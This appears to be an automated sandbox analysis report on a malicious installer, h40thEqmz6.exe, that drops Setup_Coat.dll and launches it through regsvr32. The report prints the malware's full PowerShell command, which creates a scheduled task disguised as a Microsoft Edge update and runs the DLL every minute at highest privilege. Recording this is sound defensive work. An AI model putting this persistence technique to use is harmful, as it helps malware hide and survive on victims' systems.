Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00007FF8A9305D24 memset,HeapCreate,HeapAlloc,GetLastError,memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,HeapFree,HeapFree,GetModuleHandleA,GetProcAddress,HeapFree,HeapFree,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,DeleteFileW,HeapFree,GetLastError,HeapFree,HeapFree,RtlFreeHeap,NtGetContextThread,NtSetContextThread,NtClose,HeapFree,HeapFree,HeapFree,HeapFree,memcpy,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,

6_2_00007FF8A9305D24

Source: is-CBKGS.tmp.4.dr	Static PE information: real checksum: 0xbefe2 should be: 0xbccc0
Source: is-UGL1J.tmp.4.dr	Static PE information: real checksum: 0x0 should be: 0x1237c9
Source: _setup64.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: h40thEqmz6.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x11ef3f
Source: h40thEqmz6.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x11ef3f
Source: _setup64.tmp.4.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: h40thEqmz6.exe	Static PE information: real checksum: 0x0 should be: 0xd0662

Source: is-CBKGS.tmp.4.dr

Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll

Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026E56C1 push eax; ret	6_2_026E56C9
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026E6E62 push ds; retf	6_2_026E6E6D
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026E6E88 push ds; retf	6_2_026E6E89
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_026E4D62 push eax; ret	6_2_026E4DAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 6_2_00007FF848A800BD pushad ; iretd	6_2_00007FF848A800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8488AD2A5 pushad ; iretd	7_2_00007FF8488AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C78FC push ebx; retf	7_2_00007FF8489C796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C435B push es; retf	7_2_00007FF8489C435C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C433B push es; retf	7_2_00007FF8489C433C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C434B push es; retf	7_2_00007FF8489C434C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C78B5 push ebx; retf	7_2_00007FF8489C796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C00BD pushad ; iretd	7_2_00007FF8489C00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8489C541B pushad ; retf	7_2_00007FF8489C542B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF84889D2A5 pushad ; iretd	9_2_00007FF84889D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF8489BAFFA push eax; ret	9_2_00007FF8489BB051
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF848A80A30 push eax; retf	9_2_00007FF848A80A31

Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\h40thEqmz6.exe	File created: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\h40thEqmz6.exe	File created: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Roaming\is-CBKGS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Local\is-UGL1J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	File created: C:\Users\user\AppData\Roaming\Setup_Coat.dll (copy)	Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\h40thEqmz6.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\h40thEqmz6.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
